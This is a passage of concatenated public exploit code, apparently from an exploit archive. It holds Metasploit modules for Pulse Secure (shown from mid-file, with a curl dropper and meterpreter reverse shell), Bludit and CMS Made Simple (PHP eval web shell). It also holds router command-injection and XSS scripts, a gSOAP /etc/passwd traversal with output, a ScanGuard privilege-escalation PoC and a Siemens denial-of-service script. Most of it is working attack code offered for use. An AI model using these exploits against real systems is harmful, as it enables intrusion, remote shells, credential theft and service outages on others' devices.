        ['Linux Dropper',
'Platform'       => 'linux',
'Arch'           => [ARCH_X86, ARCH_X64],
'Type'           => :linux_dropper,
'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'}
        ]
      ],
'DefaultTarget'      => 1,
'DefaultOptions'     => {
'RPORT'            => 443,
'SSL'              => true,
'CMDSTAGER::SSL'   => true
      },
'Notes'              => {
'Stability'        => [CRASH_SAFE],
'Reliability'      => [REPEATABLE_SESSION],
'SideEffects'      => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
'RelatedModules'   => ['auxiliary/gather/pulse_secure_file_disclosure']
      }
    ))

    register_options([
      OptString.new('SID', [true, 'Valid admin session ID'])
    ])
  end

  def post_auth?
    true
  end

  def exploit
    get_csrf_token

    print_status("Executing #{target.name} target")

    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(
        flavor:   :curl,
        noconcat: true
      )
    end
  end

  def get_csrf_token
    @cookie = "DSID=#{datastore['SID']}"
    print_good("Setting session cookie: #{@cookie}")

    print_status('Obtaining CSRF token')
    res = send_request_cgi(
'method' => 'GET',
'uri'    => diag_cgi,
'cookie' => @cookie
    )

    unless res && res.code == 200 && (@csrf_token = parse_csrf_token(res.body))
      fail_with(Failure::NoAccess, 'Session cookie expired or invalid')
    end

    print_good("CSRF token: #{@csrf_token}")
  end

  def parse_csrf_token(body)
    body.to_s.scan(/xsauth=([[:xdigit:]]+)/).flatten.first
  end

  def execute_command(cmd, _opts = {})
    # Prepend absolute path to curl(1), since it's not in $PATH
    cmd.prepend('/home/bin/') if cmd.start_with?('curl')

    # Bypass application whitelisting with permitted env(1)
    cmd.prepend('env ')

    vprint_status("Executing command: #{cmd}")
    print_status("Yeeting exploit at #{full_uri(diag_cgi)}")
    res = send_request_cgi(
'method'    => 'GET',
'uri'       => diag_cgi,
'cookie'    => @cookie,
'vars_get'  => {
'a'       => 'td', # tcpdump
'options' => sploit(cmd),
'xsauth'  => @csrf_token,
'toggle'  => 'Start Sniffing'
      }
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'Could not yeet exploit')
    end

    print_status("Triggering payload at #{full_uri(setcookie_cgi)}")
    res = send_request_cgi({
'method' => 'GET',
'uri'    => setcookie_cgi
    }, 3.1337)

    # 200 response code, yet 500 error in body
    unless res && res.code == 200 && !res.body.include?('500 Internal Error')
      print_warning('Payload execution may have failed')
      return
    end

    print_good('Payload execution successful')

    if datastore['PAYLOAD'] == 'cmd/unix/generic'
      print_line(res.body.sub(/\s*<html>.*/m, ''))
    end
  end

  def sploit(cmd)
    %(-r$x="#{cmd}",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <)
  end

  def diag_cgi
'/dana-admin/diag/diag.cgi'
  end

  def setcookie_cgi
'/dana-na/auth/setcookie.cgi'
  end

end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE
  include Msf::Exploit::FileDropper
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
'Name'           => "Bludit Directory Traversal Image File Upload Vulnerability",
'Description'    => %q{
        This module exploits a vulnerability in Bludit. A remote user could abuse the uuid
        parameter in the image upload feature in order to save a malicious payload anywhere
        onto the server, and then use a custom .htaccess file to bypass the file extension
        check to finally get remote code execution.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'christasa', # Original discovery
'sinn3r'     # Metasploit module
        ],
'References'     =>
        [
          ['CVE', '2019-16113'],
          ['URL', 'https://github.com/bludit/bludit/issues/1081'],
          ['URL', 'https://github.com/bludit/bludit/commit/a9640ff6b5f2c0fa770ad7758daf24fec6fbf3f5#diff-6f5ea518e6fc98fb4c16830bbf9f5dac' ]
        ],
'Platform'       => 'php',
'Arch'           => ARCH_PHP,
'Notes'          =>
        {
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability'   => [ CRASH_SAFE ]
        },
'Targets'        =>
        [
          [ 'Bludit v3.9.2', {} ]
        ],
'Privileged'     => false,
'DisclosureDate' => "2019-09-07",
'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']),
        OptString.new('BLUDITUSER', [true, 'The username for Bludit']),
        OptString.new('BLUDITPASS', [true, 'The password for Bludit'])
      ])
  end

  class PhpPayload
    attr_reader :payload
    attr_reader :name

    def initialize(p)
      @payload = p
      @name = "#{Rex::Text.rand_text_alpha(10)}.png"
    end
  end

  class LoginBadge
    attr_reader   :username
    attr_reader   :password
    attr_accessor :csrf_token
    attr_accessor :bludit_key

    def initialize(user, pass, token, key)
      @username = user
      @password = pass
      @csrf_token = token
      @bludit_key = key
    end
  end

  def check
    res = send_request_cgi({
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path, 'index.php')
    })

    unless res
      vprint_error('Connection timed out')
      return CheckCode::Unknown
    end

    html = res.get_html_document
    generator_tag = html.at('meta[@name="generator"]')
    unless generator_tag
      vprint_error('No generator metadata tag found in HTML')
      return CheckCode::Safe
    end

    content_attr = generator_tag.attributes['content']
    unless content_attr
      vprint_error("No content attribute found in metadata tag")
      return CheckCode::Safe
    end

    if content_attr.value == 'Bludit'
      return CheckCode::Detected
    end

    CheckCode::Safe
  end

  def get_uuid(login_badge)
    print_status('Retrieving UUID...')
    res = send_request_cgi({
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path, 'admin', 'new-content', 'index.php'),
'cookie' => "BLUDIT-KEY=#{login_badge.bludit_key};"
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    html = res.get_html_document
    uuid_element = html.at('input[@name="uuid"]')
    unless uuid_element
      fail_with(Failure::Unknown, 'No UUID found in admin/new-content/')
    end

    uuid_val = uuid_element.attributes['value']
    unless uuid_val && uuid_val.respond_to?(:value)
      fail_with(Failure::Unknown, 'No UUID value')
    end

    uuid_val.value
  end

  def upload_file(login_badge, uuid, content, fname)
    print_status("Uploading #{fname}...")

    data = Rex::MIME::Message.new
    data.add_part(content, 'image/png', nil, "form-data; name=\"images[]\"; filename=\"#{fname}\"")
    data.add_part(uuid, nil, nil, 'form-data; name="uuid"')
    data.add_part(login_badge.csrf_token, nil, nil, 'form-data; name="tokenCSRF"')

    res = send_request_cgi({
'method'  => 'POST',
'uri'     => normalize_uri(target_uri.path, 'admin', 'ajax', 'upload-images'),
'ctype'   => "multipart/form-data; boundary=#{data.bound}",
'cookie'  => "BLUDIT-KEY=#{login_badge.bludit_key};",
'headers' => {'X-Requested-With' => 'XMLHttpRequest'},
'data'    => data.to_s
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end
  end

  def upload_php_payload_and_exec(login_badge)
    # From: /var/www/html/bludit/bl-content/uploads/pages/5821e70ef1a8309cb835ccc9cec0fb35/
    # To: /var/www/html/bludit/bl-content/tmp
    uuid = get_uuid(login_badge)
    php_payload = get_php_payload
    upload_file(login_badge, '../../tmp', php_payload.payload, php_payload.name)

    # On the vuln app, this line occurs first:
    # Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename);
    # Even though there is a file extension check, it won't really stop us
    # from uploading the .htaccess file.
    htaccess = <<~HTA
    RewriteEngine off
    AddType application/x-httpd-php .png
    HTA
    upload_file(login_badge, uuid, htaccess, ".htaccess")
    register_file_for_cleanup('.htaccess')

    print_status("Executing #{php_payload.name}...")
    send_request_cgi({
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path, 'bl-content', 'tmp', php_payload.name)
    })
  end

  def get_php_payload
    @php_payload ||= PhpPayload.new(get_write_exec_payload(unlink_self: true))
  end

  def get_login_badge(res)
    cookies = res.get_cookies
    bludit_key = cookies.scan(/BLUDIT\-KEY=(.+);/i).flatten.first || ''

    html = res.get_html_document
    csrf_element = html.at('input[@name="tokenCSRF"]')
    unless csrf_element
      fail_with(Failure::Unknown, 'No tokenCSRF found')
    end

    csrf_val = csrf_element.attributes['value']
    unless csrf_val && csrf_val.respond_to?(:value)
      fail_with(Failure::Unknown, 'No tokenCSRF value')
    end

    LoginBadge.new(datastore['BLUDITUSER'], datastore['BLUDITPASS'], csrf_val.value, bludit_key)
  end

  def do_login
    res = send_request_cgi({
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path, 'admin', 'index.php')
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    login_badge = get_login_badge(res)
    res = send_request_cgi({
'method'    => 'POST',
'uri'       => normalize_uri(target_uri.path, 'admin', 'index.php'),
'cookie'    => "BLUDIT-KEY=#{login_badge.bludit_key};",
'vars_post' =>
        {
'tokenCSRF' => login_badge.csrf_token,
'username'  => login_badge.username,
'password'  => login_badge.password
        }
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    # A new csrf value is generated, need to update this for the upload
    if res.headers['Location'].to_s.include?('/admin/dashboard')
      store_valid_credential(user: login_badge.username, private: login_badge.password)
      res = send_request_cgi({
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path, 'admin', 'dashboard', 'index.php'),
'cookie' => "BLUDIT-KEY=#{login_badge.bludit_key};",
      })

      unless res
        fail_with(Failure::Unknown, 'Connection timed out')
      end

      new_csrf = res.body.scan(/var tokenCSRF = "(.+)";/).flatten.first
      login_badge.csrf_token = new_csrf if new_csrf
      return login_badge
    end

    fail_with(Failure::NoAccess, 'Authentication failed')
  end

  def exploit
    login_badge = do_login
    print_good("Logged in as: #{login_badge.username}")
    upload_php_payload_and_exec(login_badge)
  end
end

# Exploit Title: Technicolor TD5130.2 - Remote Command Execution
# Date: 2019-11-12
# Exploit Author: João Teles
# Vendor Homepage: https://www.technicolor.com/
# Version: TD5130v2
# Firmware Version: OI_Fw_V20
# CVE : CVE-2019-18396

---------------------------

POST /mnt_ping.cgi HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http:/HOST/mnt_ping.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Cookie: session=COOKIE
Connection: close
Upgrade-Insecure-Requests: 1

isSubmit=1&addrType=3&pingAddr=;ls&send=Send

# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: Luis Stefan
# Vendor Homepage: https://www.technicolor.com/
# Software Link: N/A
# Version: TC7300.B0 - STFA.51.20
# Tested on: macOS Mojave and Catalina
# CVE : 

#!/usr/bin/env python3
__author__ = "Luis Stefan"
__license__ = "MIT"
__version__ = "1.0"
__email__ = "luis.ss@protonmail.com"
__description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device."""

from enum import IntEnum
from scapy.all import *
import codecs, threading, time

# Define your network interface
interface = 'en0'
# Insert your interface card mac address
mac = 'xx:xx:xx:xx:xx:xx'
broadcast = 'ff:ff:ff:ff:ff:ff'
mac_hxd = codecs.decode(mac.replace(':', ''),'hex')

class Bootp(IntEnum):
    Discover = 1
    Offer = 2
    Request = 3
    Decline = 4
    Ack = 5
    Nak = 6
    Release = 7

def dhcp_discover():
    disc_pkt = Ether(src=mac, dst=broadcast) / \
        IP(src='0.0.0.0', dst='255.255.255.255') / \
        UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
        DHCP(options=[('message-type', 'discover'), 'end'])
    sendp(disc_pkt, iface=interface)

def dhcp_request(pkt):
    yraddr = pkt['BOOTP'].yraddr
    # gwaddr == Gateway Ip Address
    gwaddr = '192.168.0.1'
    param_req_list = []
    hostname = "<script>alert('XSS triggered')</script>"
    req_pkt = Ether(src=mac, dst=broadcast) / \
        IP(src='0.0.0.0', dst='255.255.255.255') / \
        UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
        DHCP(options=[('message-type', 'request'), ('server_id', gwaddr),
                      ('requested_addr', yraddr), ('hostname', hostname), 'end'])
    sendp(req_pkt, iface=interface)

def dhcp(pkt):
    print(pkt.display())
    print("#############################################################")
    if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer:
        dhcp_request(pkt)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack:
        print("Server Acknowledged")
        sys.exit(0)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline:
        print("Server Declined")
        sys.exit(0)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak:
        print("Server Nak")
        sys.exit(0)


def ver_dhcp():
    print("Verifying DHCP port traffic..")
    sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20)
    sys.exit(0)


def main():
    t1 = threading.Thread(target=ver_dhcp, args=())
    t1.setDaemon = True
    t1.start()
    time.sleep(2)
    dhcp_discover()


if __name__ == "__main__":
    main()

# Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution
# Date: 2019-11-13
# Exploit Author: Riccardo Gasparini
# Vendor Homepage: https://www.fastweb.it/
# Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network)
# Version: 0.00.81
# Tested on: Linux
# CVE : N/A

import requests, json, time, sys

current_milli_time = lambda: int(round(time.time() * 1000))

password='XXXXXXXXXXXXXXX'

if password == 'XXXXXXXXXXXXXXX':
    print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password")
    sys.exit(-1)

#get XSRF-TOKEN
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
'Referer': 'http://192.168.1.254/tr069',
}
params = ()
response = requests.get('http://192.168.1.254', headers=headers)

#login request and get sessionKey
xsrfToken=response.cookies['XSRF-TOKEN']
cookies = {
'XSRF-TOKEN': xsrfToken,
}
headers = {
'Pragma': 'no-cache',
'X-XSRF-TOKEN': xsrfToken,
'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
'Accept': 'application/json, text/plain, */*',
'Referer': 'http://192.168.1.254/tr069',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Cache-Control': 'no-cache',
}
params = (
    ('_', str(current_milli_time())),
    ('cmd', '3'),
    ('nvget', 'login_confirm'),
    ('password', password),
    ('remember_me', '1'),
    ('sessionKey', 'NULL'),
    ('username', 'admin'),
)

response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)

jsonResponse = json.loads(response.text)
sessionKey=jsonResponse["login_confirm"]["check_session"]

print("Executing command reboot\n")

#some commands as example are shown below in the mount parameter
params = (
    ('_', str(current_milli_time())),
    ('act','nvset'),
    ('service','usb_remove'),
    #Code execution
    #('mount','&ping -c 10 192.168.1.172&'),
    #('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH
    ('mount','&reboot&'),
    ('sessionKey', sessionKey),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
print(response.text)

#logout
params = (
    ('_', str(current_milli_time())),
    ('cmd', '5'),
    ('nvget', 'login_confirm'),
    ('sessionKey', sessionKey),
)

response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
print(json.dumps(json.loads(response.text), indent=2))

# Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap


POC
---------

GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------
HTTP/1.1 200 OK
Server: gSOAP/2.8
Content-Type: application/octet-stream
Content-Length: 51
Connection: close

root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh

[+] Credits: hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec          


[Vendor]
https://www.scanguard.com


[Product]
ScanGuard Antivirus
ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d

Complete Antivirus & Security Software


[Vulnerability Type]
Insecure Permissions


[CVE Reference]
CVE-2019-18895


[Affected Product Code Base]
ScanGuard Antivirus - latest


[Affected Component]
Permissions on installation directory


[Attack Type]
Local


[Impact Code execution]
true


[Impact Escalation of Privileges]
true


[Impact Information Disclosure]
true


[Attack Vectors]
Low integrity malware or non-privileged user replaces an executable to gain Admin privileges.


[Reference]
https://support.scanguard.com/en/kb/22/upgrades-available


[Security Issue]
Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to
privilege escalation via a Trojan horse executable file.

The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group.
This can allow low integrity malware the ability to replace ScanGuard executables.


C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F 
                                      Everyone:(OI)(CI)(ID)F       
                                      NT SERVICE\TrustedInstaller:(ID)F 
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F 
                                      NT AUTHORITY\SYSTEM:(ID)F 


[Exploit/POC]

#include <stdio.h>
#include <windows.h>
#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"

/* ScanGuard EoP 
  PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
  DWORD dwAttrib = GetFileAttributes(szPath);
  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){

  if(!FileExists(DISABLED_TARGET)){
    rename(TARGET, DISABLED_TARGET);
    printf("[+] ScanGuard Antivirus EoP PoC\n");
    Sleep(300);
    printf("[+] Disabled ScanGuard.exe ...\n");
    Sleep(300);
  }else{
    PWNED=TRUE;
  }

  char fname[MAX_PATH];
  char newLoc[]=TARGET;

  DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
  if (size){
     if(!PWNED){
        printf("[+] Copying exploit to vuln dir...\n");
        Sleep(300);
        CopyFile(fname, newLoc, FALSE);
        printf("[+] Replaced legit ScanGuard...\n");
        Sleep(300);
        printf("[+] Done!\n");
        Sleep(300);
        MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
        Sleep(2000);
        exit(0);
     }else{
       if(FileExists("ScamGuard.lnk")){
      system("DEL /f ScamGuard.lnk");
     }
       printf("[+] ScamGuard PWNED!!!");
       printf("[+] By hyp3rlinx\n");
       system("pause");
     }
  }
}


[Disclosure Timeline]
Vendor Notification: September 16, 2019
Received vendor acknowledgement: September 16, 2019
Second contact follow up: September 29, 2019
No more vendor replies.
November 12, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

I. VULNERABILITY
-------------------------
Reflected XSS due to lack of input filtering in MicroStrategy Library

II. CVE REFERENCE
-------------------------
Not Assigned yet

III. VENDOR
-------------------------
https://www.microstrategy.com/

IV. TIMELINE
-------------------------
05/07/2019 Vulnerability discovered
06/07/2019 Vendor contacted
06/09/2018 MicroStrategy Fix the vulnerability at the release V11.1.3

V. CREDIT
-------------------------
Alphan Yavas from Biznet Bilisim A.S.

VI. DESCRIPTION
-------------------------
Reflected XSS due to lack of input filtering in MicroStrategy Library
(before 11.1.3) which allow a remote attacker to conduct reflected
cross-site scripting attacks.

#!/bin/bash
#
#
# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
#
#
# Vendor: Siemens AG
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
#                   With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
#                   All firmware versions < V6.00.320
#                   ------
#                   Model: PXC00-U, PXC64-U, PXC128-U
#                   With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
#                   All firmware versions < V6.00.320
#                   ------
#                   Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
#                   With activated web server
#                   All firmware versions < V6.00.320
#
# Summary: Desigo PX is a modern building automation and control
# system for the entire field of building service plants. Scalable
# from small to large projects with highest degree of energy efficiency,
# openness and user-friendly operation.
#
# Desc: The device contains a vulnerability that could allow an attacker
# to cause a denial of service condition on the device's web server
# by sending a specially crafted HTTP message to the web server port
# (tcp/80). The security vulnerability could be exploited by an attacker
# with network access to an affected device. Successful exploitation
# requires no system privileges and no user interaction. An attacker
# could use the vulnerability to compromise the availability of the
# device's web service. While the device itself stays operational, the
# web server responds with HTTP status code 404 (Not found) to any further
# request. A reboot is required to recover the web interface.
#
# Tested on: HP StorageWorks MSL4048 httpd
#
# ================================================================================
# Expected result after sending the directory traversal sequence: /dir?dir=../../:
# --------------------------------------------------------------------------------
#
# $ curl http://10.0.0.17/index.htm
# <HEAD><TITLE>404 Not Found</TITLE></HEAD>
# <BODY><H1>404 Not Found</H1>
# Url '/INDEX.HTM' not found on server<P>
# </BODY>
#
# ================================================================================
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5542
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php
#
# Vendor ID: SSA-898181
# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
#
# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
# CWE URL: https://cwe.mitre.org/data/definitions/472.html
# CVE ID: CVE-2019-13927
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
# CVSS v3.1 Base Score: 5.3
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
#
#
# 06.06.2019
#


echo -ne "\n----------------------------------"
echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
echo -ne "\n----------------------------------\n"
if [ "$#" -ne 1 ]; then
  echo -ne "\nUsage: $0 [ipaddr]\n\n"
  exit
fi
IP=$1
TARGET="http://$IP/"
PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`
echo -ne "\n[+] Sending payload to $IP on port 80."
curl -s "$TARGET$PAYLOAD"> /dev/null
echo -ne "\n[*] Done"
echo -ne "\n[+] Checking if exploit was successful..."
status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F""'{print $2}')
if [ "$status" == "404" ]; then
  echo -ne "\n[*] Exploit successful!\n"
else
  echo -ne "\n[-] Exploit unsuccessful.\n"
  exit
fi

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name' => 'CMS Made Simple Authenticated RCE via object injection',
'Description' => %q(
        An issue was discovered in CMS Made Simple 2.2.8.
        In the module DesignManager (in the files action.admin_bulk_css.php
        and action.admin_bulk_template.php), with an unprivileged user
        with Designer permission, it is possible to reach an unserialize
        call with a crafted value in the m1_allparms parameter,
        and achieve object injection.

        This module has been successfully tested on CMS Made Simple versions
        2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1.
      ),
'Author' => [
'Daniele Scanu danielescanu20[at]gmail.com', # Discovered and exploit. twitter.com/sk4pwn
      ],
'License' => MSF_LICENSE,
'References' => [
        ['CVE', '2019-9055'],
        ['CWE', '74'],
        ['URL', 'https://newsletter.cmsmadesimple.org/w/89247Qog4jCRCuRinvhsofwg'],
        ['URL', 'https://www.cmsmadesimple.org/2019/03/Announcing-CMS-Made-Simple-v2.2.10-Spuzzum']
      ],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => [ARCH_PHP],
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 26 2019'))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base cmsms directory path', '/']),
        OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
        OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
      ]
    )
    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ])
  end

  def multipart_form_data(uri, data, message)
    send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', uri),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{message.bound}",
'cookie' => @cookies
    )
  end

  def post(uri, data)
    send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', uri),
'method' => 'POST',
'vars_post' => data,
'cookie' => @cookies
    )
  end

  def get(path, filename)
    send_request_cgi(
'uri' => normalize_uri(target_uri.path, path, filename),
'method' => 'GET'
    )
  end

  def check
    res = get('', 'index.php')
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.body.match?(/CMS Made Simple/i)
      return CheckCode::Safe
    end

    version = Gem::Version.new(res.body.scan(/CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/).flatten.first)
    vprint_status("#{peer} - CMS Made Simple Version: #{version}")

    if version <= Gem::Version.new('2.2.9.1')
      return CheckCode::Appears
    end

    return CheckCode::Safe
  end

  def login
    data = {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'loginsubmit' => 'Submit'
    }
    res = post('login.php', data)

    unless res
      fail_with(Failure::Unreachable,
'A response was not received from the remote host')
    end

    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ %r{\/admin\?(.*)?=(.*)}
      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
    end
    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
    vprint_good("#{peer} - Authentication successful")
    @csrf_name = Regexp.last_match(1)
    csrf_val = Regexp.last_match(2)
    @csrf = { @csrf_name => csrf_val }
    @cookies = res.get_cookies
  end

  def send_injection
    # prepare shell command
    shell_name = rand_text_alpha(8..12) + '.php'
    cmd = Rex::Text.encode_base64(payload.encoded).delete('\n', '')
    cmd = "echo \"<?php eval(base64_decode('#{cmd}')); ?>\"> #{shell_name}"

    # prepare serialized object
    final_payload = 'a:2:{s:10:"css_select";a:4:{i:0;s:2:"19";i:1;s:2:"21";i:2;O:13:"dm_xml_reader":1:{s:31:"'
    final_payload += "\x00" + 'dm_xml_reader' + "\x00"
    final_payload += '_old_err_handler";a:2:{i:0;O:21:"CmsLayoutTemplateType":1:{s:28:"'
    final_payload += "\x00" + 'CmsLayoutTemplateType' + "\x00"
    final_payload += '_data";a:2:{s:13:"help_callback";s:6:"system";s:4:"name";s:' + cmd.length.to_s + ':"' + cmd + '";}}'
    final_payload += 'i:1;s:21:"get_template_helptext";}};i:3;s:5:"dummy";}s:15:"css_bulk_action";s:6:"export";}'

    # create message with payload
    message = Rex::MIME::Message.new
    message.add_part(@csrf[@csrf_name], nil, nil, "form-data; name=\"#{@csrf_name}\"")
    message.add_part('DesignManager,m1_,admin_bulk_template,0', nil, nil, 'form-data; name="mact"')
    message.add_part(Rex::Text.encode_base64(final_payload), nil, nil, 'form-data; name="m1_allparms"')
    data = message.to_s

    # send payload
    payload_res = multipart_form_data('moduleinterface.php', data, message)
    fail_with(Failure::NotFound, 'Failed to send payload') unless payload_res
    register_files_for_cleanup(shell_name)
    # open shell
    res = get('admin', shell_name)
    if res && res.code == 404
      print_error "Shell #{shell_name} not found"
    end
  end

  def exploit
    unless [CheckCode::Detected, CheckCode::Appears].include?(check)
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end
    login
    send_injection
  end
end